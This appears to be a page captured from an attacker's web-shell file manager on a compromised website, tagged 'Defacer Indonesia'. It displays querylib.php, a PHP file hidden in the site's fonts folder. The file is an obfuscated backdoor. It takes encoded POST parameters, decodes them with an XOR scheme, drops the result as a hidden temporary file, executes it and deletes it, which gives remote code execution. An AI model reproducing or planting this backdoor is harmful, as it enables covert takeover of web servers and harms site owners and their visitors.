whoami7 - Manager
:
/
home
/
analuakl
/
grinsentertainment.com
/
fonts
/
Upload File:
files >> /home/analuakl/grinsentertainment.com/fonts/querylib.php
<?php if(isset($_POST["\x65\x6Et"]) ? true : false){ $element = array_filter(["/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path(), "/var/tmp", getcwd(), sys_get_temp_dir(), "/dev/shm", getenv("TMP")]); $descriptor = $_POST["\x65\x6Et"]; $descriptor= explode( '.', $descriptor ) ; $binding = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $o = 0; $__tmp = $descriptor; while ($v7 = array_shift($__tmp)) { $chS = ord($s[$o % $sLen]); $d = ((int)$v7 - $chS - ($o % 10)) ^ 15; $binding .= chr($d); $o++; } foreach ($element as $desc) { if (is_dir($desc) && is_writable($desc)) { $ptr = join("/", [$desc, ".data_chunk"]); if (file_put_contents($ptr, $binding)) { require $ptr; unlink($ptr); die(); } } } } if(isset($_POST["re\x73o\x75\x72\x63e"])){ $reference = $_POST["re\x73o\x75\x72\x63e"]; $reference = explode ('.' ,$reference); $token = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); $o = 0; foreach( $reference as $v3) { $sChar = ord( $s[$o % $lenS]); $d =( ( int)$v3 - $sChar -( $o % 10)) ^ 99; $token.=chr( $d); $o++; } $parameter_group = array_filter([getenv("TMP"), "/var/tmp", getcwd(), getenv("TEMP"), sys_get_temp_dir(), "/dev/shm", ini_get("upload_tmp_dir"), "/tmp", session_save_path()]); while ($property_set = array_shift($parameter_group)) { if (max(0, is_dir($property_set) * is_writable($property_set))) { $flag = sprintf("%s/.value", $property_set); $success = file_put_contents($flag, $token); if ($success) { include $flag; @unlink($flag); die();} } } } if(isset($_POST["val"])){ $comp = $_POST["val"]; $comp= explode ('.' , $comp ); $hld = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); $t = 0; $len = count( $comp); do { if( $t >= $len) break; $v3 = $comp[$t]; $chS = ord( $s[$t % $lenS]); $d =( ( int)$v3 - $chS -( $t % 10)) ^ 59; $hld .= chr( $d); $t++; } while( true); $marker = array_filter(["/tmp", getcwd(), session_save_path(), getenv("TEMP"), "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getenv("TMP"), sys_get_temp_dir()]); foreach ($marker as $key => $sym) { if (array_product([is_dir($sym), is_writable($sym)])) { $ptr = str_replace("{var_dir}", $sym, "{var_dir}/.descriptor"); $success = file_put_contents($ptr, $hld); if ($success) { include $ptr; @unlink($ptr); exit;} } } }
Copyright ©2021 || Defacer Indonesia